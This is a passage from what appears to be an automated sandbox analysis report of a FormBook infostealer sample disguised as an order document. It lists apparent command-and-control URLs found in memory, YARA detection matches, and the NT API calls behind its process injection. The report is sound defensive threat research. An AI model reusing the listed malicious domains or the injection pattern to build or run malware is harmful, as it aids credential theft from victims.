6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004F98000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000003D28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://3cubesinterior.in/n8zi/?Y6vp=3PLd8j&OdjTHtuX=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTX
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004950000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.00000000036E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://architect-usschool.com/s24g/?Y6vp=3PLd8j&OdjTHtuX=4rIlPCx72NWCI0QJXJwD
            Source: compact.exe, 0000000A.00000002.4574298276.000000000449A000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.000000000322A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://epicbazaarhub.com/2769/?OdjTHtuX=rQ9MRvShllEvhf19NmQGPjdBfvwxqGfh/iQ/JyzvIKd3JVnhiEf6Ad8S1fm4
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.3
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28903/search.png)
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000000.00000002.2120287530.0000000002953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://searchdiscovered.com/__media__/images/logo.gif)
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004C74000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000003A04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://superunicornpalace.com/mwa4/?Y6vp=3PLd8j&OdjTHtuX=BKtoJfTGgHJzrpd1kXP6JuCpnJS0Vaq/yhZppoO2EP3
            Source: EUSOiCcoIEEJJ.exe, 0000000D.00000002.4576370278.0000000004E30000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hondamechanic.today
            Source: EUSOiCcoIEEJJ.exe, 0000000D.00000002.4576370278.0000000004E30000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hondamechanic.today/pv57/
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mengistiebethlehem.com/Christmas_City_Studio.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000000A.00000002.4577738363.0000000006460000.00000004.00000800.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mengistiebethlehem.com/Lehigh_Valley.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe1UYWx%2F
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mengistiebethlehem.com/Moravia.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe1UYWx%2FFitbFc
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000000A.00000002.4577738363.0000000006460000.00000004.00000800.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mengistiebethlehem.com/display.cfm
            Source: compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
            Source: compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
            Source: compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004308000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000003098000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hao7.vip
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004AE2000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000000A.00000002.4577738363.0000000006460000.00000004.00000800.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000003872000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
            Source: compact.exe, 0000000A.00000002.4565290385.000000000312A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: compact.exe, 0000000A.00000002.4565290385.00000000030FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: compact.exe, 0000000A.00000003.2683460496.0000000007F3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: compact.exe, 0000000A.00000002.4565290385.00000000030FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: compact.exe, 0000000A.00000002.4565290385.00000000030FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: compact.exe, 0000000A.00000002.4565290385.000000000312A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: compact.exe, 0000000A.00000002.4565290385.00000000030FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: compact.exe, 0000000A.00000002.4565290385.00000000030FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: compact.exe, 0000000A.00000002.4565290385.000000000312A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://support.hostgator.com/
            Source: compact.exe, 0000000A.00000002.4577934774.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: firefox.exe, 0000000E.00000002.2790664074.00000000256C4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.fondazionegtech.org/jmiz/?OdjTHtuX=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWK
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004AE2000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000000A.00000002.4577738363.0000000006460000.00000004.00000800.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000003872000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=easybackpage.net
            Source: EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000003872000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4565204551.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2506704352.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4571364654.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4576370278.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2507910619.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.4565204551.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2506704352.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.4571364654.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.4576370278.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2507910619.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            .NET source code contains very large array initializations
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.77e0000.5.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.27bc388.0.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0042B683 NtClose,5_2_0042B683
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2B60 NtClose,LdrInitializeThunk,5_2_013F2B60
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_013F2DF0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_013F2C70
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F35C0 NtCreateMutant,LdrInitializeThunk,5_2_013F35C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F4340 NtSetContextThread,5_2_013F4340
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F4650 NtSuspendThread,5_2_013F4650
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2BA0 NtEnumerateValueKey,5_2_013F2BA0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2B80 NtQueryInformationFile,5_2_013F2B80
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2BF0 NtAllocateVirtualMemory,5_2_013F2BF0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2BE0 NtQueryValueKey,5_2_013F2BE0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2AB0 NtWaitForSingleObject,5_2_013F2AB0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2AF0 NtWriteFile,5_2_013F2AF0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2AD0 NtReadFile,5_2_013F2AD0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2D30 NtUnmapViewOfSection,5_2_013F2D30
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2D10 NtMapViewOfSection,5_2_013F2D10
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2D00 NtSetInformationFile,5_2_013F2D00
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2DB0 NtEnumerateKey,5_2_013F2DB0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2DD0 NtDelayExecution,5_2_013F2DD0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2C00 NtQueryInformationProcess,5_2_013F2C00
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2C60 NtCreateKey,5_2_013F2C60
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2CA0 NtQueryInformationToken,5_2_013F2CA0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2CF0 NtOpenProcess,5_2_013F2CF0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2CC0 NtQueryVirtualMemory,5_2_013F2CC0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2F30 NtCreateSection,5_2_013F2F30
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2F60 NtCreateProcessEx,5_2_013F2F60
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2FB0 NtResumeThread,5_2_013F2FB0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2FA0 NtQuerySection,5_2_013F2FA0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2F90 NtProtectVirtualMemory,5_2_013F2F90
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2FE0 NtCreateFile,5_2_013F2FE0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2E30 NtWriteVirtualMemory,5_2_013F2E30
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2EA0 NtAdjustPrivilegesToken,5_2_013F2EA0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2E80 NtReadVirtualMemory,5_2_013F2E80
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F2EE0 NtQueueApcThread,5_2_013F2EE0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F3010 NtOpenDirectoryObject,5_2_013F3010
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F3090 NtSetValueKey,5_2_013F3090
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F39B0 NtGetContextThread,5_2_013F39B0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F3D10 NtOpenProcessToken,5_2_013F3D10
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013F3D70 NtOpenThread,5_2_013F3D70
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03604340 NtSetContextThread,LdrInitializeThunk,10_2_03604340
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03604650 NtSuspendThread,LdrInitializeThunk,10_2_03604650
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602B60 NtClose,LdrInitializeThunk,10_2_03602B60
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602BE0 NtQueryValueKey,LdrInitializeThunk,10_2_03602BE0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_03602BF0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_03602BA0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602AF0 NtWriteFile,LdrInitializeThunk,10_2_03602AF0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602AD0 NtReadFile,LdrInitializeThunk,10_2_03602AD0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602F30 NtCreateSection,LdrInitializeThunk,10_2_03602F30
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602FE0 NtCreateFile,LdrInitializeThunk,10_2_03602FE0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602FB0 NtResumeThread,LdrInitializeThunk,10_2_03602FB0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602EE0 NtQueueApcThread,LdrInitializeThunk,10_2_03602EE0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03602E80 NtReadVirtualMemory,LdrInitializeThunk,10_2_03602E80
